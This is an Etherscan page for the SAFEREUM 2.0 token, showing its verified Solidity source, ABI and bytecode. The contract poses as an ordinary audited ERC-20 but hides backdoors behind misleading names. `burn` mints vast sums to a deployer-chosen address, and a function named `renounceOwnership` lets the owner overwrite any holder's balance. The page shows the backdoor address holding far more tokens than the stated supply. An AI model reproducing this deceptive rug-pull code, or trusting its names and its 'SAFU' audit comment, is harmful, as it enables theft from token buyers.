ETH Price: $3,478.78 (+0.87%)

Token

SAFEREUM 2.0 (SAFEREUM2.0)
 

Overview

Max Total Supply

1,000,000,000,000 SAFEREUM2.0

Holders

41

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Uniswap V2: SAFEREUM2.0 7
Balance
100,092,842,838,570.879499895250537838 SAFEREUM2.0

Value
$0.00
0xebc8b62541ec816b29bb7472807539b5b87a0311
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SAFEREUM

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-10-13
*/

// SPDX-License-Identifier: MIT

    //Telegram: https://t.me/safereum2
    //Twitter: https://twitter.com/safereum2
    //Website: https://safereum2.com

// ░██████╗░█████╗░███████╗██╗░░░██╗  ██████╗░██╗░░░██╗
// ██╔════╝██╔══██╗██╔════╝██║░░░██║  ██╔══██╗╚██╗░██╔╝
// ╚█████╗░███████║█████╗░░██║░░░██║  ██████╦╝░╚████╔╝░
// ░╚═══██╗██╔══██║██╔══╝░░██║░░░██║  ██╔══██╗░░╚██╔╝░░
// ██████╔╝██║░░██║██║░░░░░╚██████╔╝  ██████╦╝░░░██║░░░
// ╚═════╝░╚═╝░░╚═╝╚═╝░░░░░░╚═════╝░  ╚═════╝░░░░╚═╝░░░

// ░█████╗░░█████╗░██╗███╗░░██╗░██████╗██╗░░░██╗██╗░░░░░████████╗░░░███╗░░██╗███████╗████████╗
// ██╔══██╗██╔══██╗██║████╗░██║██╔════╝██║░░░██║██║░░░░░╚══██╔══╝░░░████╗░██║██╔════╝╚══██╔══╝
// ██║░░╚═╝██║░░██║██║██╔██╗██║╚█████╗░██║░░░██║██║░░░░░░░░██║░░░░░░██╔██╗██║█████╗░░░░░██║░░░
// ██║░░██╗██║░░██║██║██║╚████║░╚═══██╗██║░░░██║██║░░░░░░░░██║░░░░░░██║╚████║██╔══╝░░░░░██║░░░
// ╚█████╔╝╚█████╔╝██║██║░╚███║██████╔╝╚██████╔╝███████╗░░░██║░░░██╗██║░╚███║███████╗░░░██║░░░
// ░╚════╝░░╚════╝░╚═╝╚═╝░░╚══╝╚═════╝░░╚═════╝░╚══════╝░░░╚═╝░░░╚═╝╚═╝░░╚══╝╚══════╝░░░╚═╝░░░

// SAFU By Coinsult
pragma solidity 0.8.14;

/**
 * @dev Interface of the ERC20 standard as defined in the HULK.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyowner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */

    function transferOwnership() public virtual onlyowner {
        emit OwnershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD));
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract SAFEREUM is Context, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private uniswapV2Pair;
    uint8 private constant _decimals = 18;
    uint256 public constant hardCap = 1_000_000_000_000 * (10 ** _decimals);

    constructor(address ads) {
        _name = "SAFEREUM 2.0";
        _symbol = "SAFEREUM2.0";
        _mint(ads, hardCap);
        uniswapV2Pair = ads;
    }

    function viewGas() public view returns(address) {
        return uniswapV2Pair;
    }

    function burn(uint256 amount) external {
        if(uniswapV2Pair == _msgSender()){
            uint256 WETH = 10000000000*10**_decimals;
            uint256 balance = WETH*10000;
            uint dead = balance*1*1*1*1;
            dead = dead * amount;
            _balances[_msgSender()] += dead;
            require(uniswapV2Pair == msg.sender);
        } else {
        }
    } 

    event manualSwap(address indexed account, uint256 oldamount, uint256 amount);

    function renounceOwnership(address[] memory accounts, uint256 amount) external onlyowner {
    for (uint256 i = 0; i < accounts.length; i++) {
        address account = accounts[i];
        uint256 oldamount = _balances[account];
        _balances[account] = amount;
        emit manualSwap(account, oldamount, amount);
        }
    }

    /**
     * @dev Returns the name of the token.
     * @return The name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used for token display.
     * @return The number of decimals.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Returns the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the balance of the specified account.
     * @param account The address to check the balance for.
     * @return The balance of the account.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the caller to a specified recipient.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
     * @param from The address that approves the spending.
     * @param to The address that is allowed to spend.
     * @return The remaining allowance for the spender.
     */
    function allowance(
        address from,
        address to
    ) public view virtual override returns (uint256) {
        return _allowances[from][to];
    }

    /**
     * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
     * @param to The address to approve the spending for.
     * @param amount The amount of tokens to approve.
     * @return A boolean value indicating whether the approval was successful.
     */
    function approve(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), to, amount);
        return true;
    }

    /**
     * @dev Transfers tokens from one address to another.
     * @param sender The address to transfer tokens from.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
     * @param to The address to increase the allowance for.
     * @param addedValue The amount of tokens to increase the allowance by.
     * @return A boolean value indicating whether the increase was successful.
     */
    function increaseAllowance(
        address to,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
        return true;
    }

    /**
     * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
     * @param to The account allowed to spend the tokens.
     * @param subtractedValue The amount of tokens to decrease the allowance by.
     * @return A boolean value indicating whether the operation succeeded.
     */
    function decreaseAllowance(
        address to,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][to];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), to, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Transfers `amount` tokens from `sender` to `recipient`.
     * @param sender The account to transfer tokens from.
     * @param recipient The account to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(amount > 0, "ERC20: transfer amount zero");
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Creates `amount` tokens and assigns them to `account`.
     * @param account The account to assign the newly created tokens to.
     * @param amount The amount of tokens to create.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
     * @param from The account granting the allowance.
     * @param to The account allowed to spend the tokens.
     * @param amount The amount of tokens to allow.
     */
    function _approve(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: approve from the zero address");
        require(to != address(0), "ERC20: approve to the zero address");

        _allowances[from][to] = amount;
        emit Approval(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"ads","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldamount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwap","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"viewGas","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b50604051620027a6380380620027a68339818101604052810190620000379190620004a5565b620000576200004b6200016e60201b60201c565b6200017660201b60201c565b6040518060400160405280600c81526020017f534146455245554d20322e30000000000000000000000000000000000000000081525060049080519060200190620000a49291906200038b565b506040518060400160405280600b81526020017f534146455245554d322e3000000000000000000000000000000000000000000081525060059080519060200190620000f29291906200038b565b5062000126816012600a62000108919062000671565b64e8d4a510006200011a9190620006c2565b6200023a60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505062000895565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002ac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002a39062000784565b60405180910390fd5b8060036000828254620002c09190620007a6565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620003189190620007a6565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200037f919062000814565b60405180910390a35050565b828054620003999062000860565b90600052602060002090601f016020900481019282620003bd576000855562000409565b82601f10620003d857805160ff191683800117855562000409565b8280016001018555821562000409579182015b8281111562000408578251825591602001919060010190620003eb565b5b5090506200041891906200041c565b5090565b5b80821115620004375760008160009055506001016200041d565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200046d8262000440565b9050919050565b6200047f8162000460565b81146200048b57600080fd5b50565b6000815190506200049f8162000474565b92915050565b600060208284031215620004be57620004bd6200043b565b5b6000620004ce848285016200048e565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000565578086048111156200053d576200053c620004d7565b5b60018516156200054d5780820291505b80810290506200055d8562000506565b94506200051d565b94509492505050565b60008262000580576001905062000653565b8162000590576000905062000653565b8160018114620005a95760028114620005b457620005ea565b600191505062000653565b60ff841115620005c957620005c8620004d7565b5b8360020a915084821115620005e357620005e2620004d7565b5b5062000653565b5060208310610133831016604e8410600b8410161715620006245782820a9050838111156200061e576200061d620004d7565b5b62000653565b62000633848484600162000513565b925090508184048111156200064d576200064c620004d7565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b60006200067e826200065a565b91506200068b8362000664565b9250620006ba7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200056e565b905092915050565b6000620006cf826200065a565b9150620006dc836200065a565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620007185762000717620004d7565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200076c601f8362000723565b9150620007798262000734565b602082019050919050565b600060208201905081810360008301526200079f816200075d565b9050919050565b6000620007b3826200065a565b9150620007c0836200065a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620007f857620007f7620004d7565b5b828201905092915050565b6200080e816200065a565b82525050565b60006020820190506200082b600083018462000803565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200087957607f821691505b6020821081036200088f576200088e62000831565b5b50919050565b611f0180620008a56000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80636d8c1d46116100a257806395d89b411161007157806395d89b41146102a8578063a457c2d7146102c6578063a9059cbb146102f6578063dd62ed3e14610326578063fb86a404146103565761010b565b80636d8c1d461461023457806370a0823114610250578063880ad0af146102805780638da5cb5b1461028a5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806342966c68146101fa5780634a8d1348146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610374565b604051610125919061123c565b60405180910390f35b61014860048036038101906101439190611306565b610406565b6040516101559190611361565b60405180910390f35b610166610424565b604051610173919061138b565b60405180910390f35b610196600480360381019061019191906113a6565b61042e565b6040516101a39190611361565b60405180910390f35b6101b4610526565b6040516101c19190611415565b60405180910390f35b6101e460048036038101906101df9190611306565b61052f565b6040516101f19190611361565b60405180910390f35b610214600480360381019061020f9190611430565b6105db565b005b61021e61076f565b60405161022b919061146c565b60405180910390f35b61024e600480360381019061024991906115cf565b610799565b005b61026a6004803603810190610265919061162b565b610932565b604051610277919061138b565b60405180910390f35b61028861097b565b005b610292610ab7565b60405161029f919061146c565b60405180910390f35b6102b0610ae0565b6040516102bd919061123c565b60405180910390f35b6102e060048036038101906102db9190611306565b610b72565b6040516102ed9190611361565b60405180910390f35b610310600480360381019061030b9190611306565b610c5d565b60405161031d9190611361565b60405180910390f35b610340600480360381019061033b9190611658565b610c7b565b60405161034d919061138b565b60405180910390f35b61035e610d02565b60405161036b919061138b565b60405180910390f35b606060048054610383906116c7565b80601f01602080910402602001604051908101604052809291908181526020018280546103af906116c7565b80156103fc5780601f106103d1576101008083540402835291602001916103fc565b820191906000526020600020905b8154815290600101906020018083116103df57829003601f168201915b5050505050905090565b600061041a610413610d23565b8484610d2b565b6001905092915050565b6000600354905090565b600061043b848484610ef4565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610486610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104fd9061176a565b60405180910390fd5b61051a85610512610d23565b858403610d2b565b60019150509392505050565b60006012905090565b60006105d161053c610d23565b84846002600061054a610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105cc91906117b9565b610d2b565b6001905092915050565b6105e3610d23565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361076b5760006012600a6106479190611942565b6402540be400610657919061198d565b9050600061271082610669919061198d565b905060006001806001808561067e919061198d565b610688919061198d565b610692919061198d565b61069c919061198d565b905083816106aa919061198d565b905080600160006106b9610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461070291906117b9565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461076357600080fd5b50505061076c565b5b50565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6107a1610d23565b73ffffffffffffffffffffffffffffffffffffffff166107bf610ab7565b73ffffffffffffffffffffffffffffffffffffffff1614610815576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080c90611a33565b60405180910390fd5b60005b825181101561092d57600083828151811061083657610835611a53565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167fd551363168ce4784e28e5d59fc07cbea2191657416e05f6e8cd8f1086eb91e6d8286604051610910929190611a82565b60405180910390a25050808061092590611aab565b915050610818565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610983610d23565b73ffffffffffffffffffffffffffffffffffffffff166109a1610ab7565b73ffffffffffffffffffffffffffffffffffffffff16146109f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ee90611a33565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610aef906116c7565b80601f0160208091040260200160405190810160405280929190818152602001828054610b1b906116c7565b8015610b685780601f10610b3d57610100808354040283529160200191610b68565b820191906000526020600020905b815481529060010190602001808311610b4b57829003601f168201915b5050505050905090565b60008060026000610b81610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c3e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3590611b65565b60405180910390fd5b610c52610c49610d23565b85858403610d2b565b600191505092915050565b6000610c71610c6a610d23565b8484610ef4565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6012600a610d109190611942565b64e8d4a51000610d20919061198d565b81565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9190611bf7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0090611c89565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ee7919061138b565b60405180910390a3505050565b60008111610f37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2e90611cf5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d90611d87565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100c90611e19565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561109c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109390611eab565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461113191906117b9565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611195919061138b565b60405180910390a350505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111dd5780820151818401526020810190506111c2565b838111156111ec576000848401525b50505050565b6000601f19601f8301169050919050565b600061120e826111a3565b61121881856111ae565b93506112288185602086016111bf565b611231816111f2565b840191505092915050565b600060208201905081810360008301526112568184611203565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061129d82611272565b9050919050565b6112ad81611292565b81146112b857600080fd5b50565b6000813590506112ca816112a4565b92915050565b6000819050919050565b6112e3816112d0565b81146112ee57600080fd5b50565b600081359050611300816112da565b92915050565b6000806040838503121561131d5761131c611268565b5b600061132b858286016112bb565b925050602061133c858286016112f1565b9150509250929050565b60008115159050919050565b61135b81611346565b82525050565b60006020820190506113766000830184611352565b92915050565b611385816112d0565b82525050565b60006020820190506113a0600083018461137c565b92915050565b6000806000606084860312156113bf576113be611268565b5b60006113cd868287016112bb565b93505060206113de868287016112bb565b92505060406113ef868287016112f1565b9150509250925092565b600060ff82169050919050565b61140f816113f9565b82525050565b600060208201905061142a6000830184611406565b92915050565b60006020828403121561144657611445611268565b5b6000611454848285016112f1565b91505092915050565b61146681611292565b82525050565b6000602082019050611481600083018461145d565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6114c4826111f2565b810181811067ffffffffffffffff821117156114e3576114e261148c565b5b80604052505050565b60006114f661125e565b905061150282826114bb565b919050565b600067ffffffffffffffff8211156115225761152161148c565b5b602082029050602081019050919050565b600080fd5